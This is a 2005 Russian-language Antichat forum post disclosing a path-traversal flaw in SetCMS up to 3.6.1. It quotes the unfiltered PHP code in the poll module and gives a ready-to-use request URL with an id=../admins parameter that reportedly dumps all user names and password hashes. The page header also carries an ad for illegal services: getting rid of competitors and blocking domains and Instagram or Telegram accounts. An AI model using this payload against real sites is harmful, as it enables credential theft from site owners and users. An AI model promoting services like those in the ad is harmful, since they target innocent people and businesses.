Форум АНТИЧАТ - Взлом SetCMS <= 3.6.1

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Взлом SetCMS <= 3.6.1

Опции темы

Поиск в этой теме

Опции просмотра

Взлом SetCMS <= 3.6.1

18.08.2005, 03:17

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

Провел на форуме:
2386719

Репутация: 1384

Отправить сообщение для madnet с помощью ICQ

Взлом SetCMS <= 3.6.1

Как я и говорил кое что более интересое чем xss

Во всех версиях SetCMS до 3.6.2 обнаружена критическая уязвимость
возможно получение всех паролей пользователей через модуль голосования

\modules\golos\index.php

ошибка в нефильтруемой переменной id

PHP код:


		
			
if ($mc == "viewvote" && isset($_GET['id']))

{

 $votenum = $_GET['id'];

 $file = file("files/polls/$votenum.set");

таким образом, составив такой запрос

Код:

http://target.com/SetCMS/index.php?set=golos&mc=viewrezult&id=../admins

мы получим список всех пользователей и их хэши.

(с) madnet

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

Последний раз редактировалось madnet; 16.01.2006 в 18:38..

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход